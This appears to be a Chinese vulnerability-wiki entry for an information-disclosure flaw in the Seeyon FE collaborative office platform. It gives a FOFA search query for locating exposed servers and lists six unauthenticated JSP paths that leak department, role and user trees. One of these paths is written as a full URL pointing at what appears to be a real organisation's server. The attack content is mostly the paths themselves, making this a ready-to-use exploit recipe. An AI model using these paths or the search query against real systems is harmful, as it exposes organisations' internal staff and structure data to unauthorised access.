fofamini-wiki

登录白背景

源码

致远互联FE协作办公平台多路径存在信息泄露漏洞

北京致远互联软件股份有限公司致远互联FE协作办公平台GUID存在信息泄露漏洞，攻击者可通过该漏洞获取敏感信息。

/common/deptComboTree.jsp#this

/common/deptListTree.jsp#this

/common/sortListTree.jsp#this

/common/roleComboTree.jsp#this

/common/userComboTree.jsp#this

http://oa.avit.com.cn:9090/common/userTree.jsp#this

原文: https://www.yuque.com/xiaokp7/ocvun2/hs92qc1mrtu9sirt

# 致远互联FE协作办公平台多路径存在信息泄露漏洞

# 一、漏洞简介
北京致远互联软件股份有限公司致远互联FE协作办公平台GUID存在信息泄露漏洞，攻击者可通过该漏洞获取敏感信息。

# 二、影响版本
+ 致远互联-FE协作办公平台

# 三、资产测绘
+ fofa`app="致远互联-FE"`
+ 特征

![1698659959745-2fa812d0-dff6-4e46-9a5a-d5060f83756a.png](./img/1tykwdAHFZ4Leh08/1698659959745-2fa812d0-dff6-4e46-9a5a-d5060f83756a-560995.png)

# 四、漏洞复现
```plain
/common/deptComboTree.jsp#this
```

![1715788328322-170af6d4-4403-479c-a243-eb4a8f402b4a.png](./img/1tykwdAHFZ4Leh08/1715788328322-170af6d4-4403-479c-a243-eb4a8f402b4a-605937.png)

```plain
/common/deptListTree.jsp#this
```

![1715788433098-e7651f31-e4aa-4a42-bffb-f1d082fdf1e5.png](./img/1tykwdAHFZ4Leh08/1715788433098-e7651f31-e4aa-4a42-bffb-f1d082fdf1e5-534705.png)

```plain
/common/sortListTree.jsp#this
```

![1715788474382-35128c8a-49a2-479f-9f9b-fa50b3e7c6e8.png](./img/1tykwdAHFZ4Leh08/1715788474382-35128c8a-49a2-479f-9f9b-fa50b3e7c6e8-459561.png)

```plain
/common/roleComboTree.jsp#this
```

![1715788511746-20a58d8b-1a8c-4d91-a4a9-521a15606cad.png](./img/1tykwdAHFZ4Leh08/1715788511746-20a58d8b-1a8c-4d91-a4a9-521a15606cad-394424.png)

```plain
/common/userComboTree.jsp#this
```

![1715788537106-19b7b76b-5aa7-4b17-9d9e-727a6bfdcf6d.png](./img/1tykwdAHFZ4Leh08/1715788537106-19b7b76b-5aa7-4b17-9d9e-727a6bfdcf6d-500374.png)

```plain
http://oa.avit.com.cn:9090/common/userTree.jsp#this
```

![1715788567031-4c41cb97-6d9c-49f2-9de9-761f381d0025.png](./img/1tykwdAHFZ4Leh08/1715788567031-4c41cb97-6d9c-49f2-9de9-761f381d0025-217292.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hs92qc1mrtu9sirt>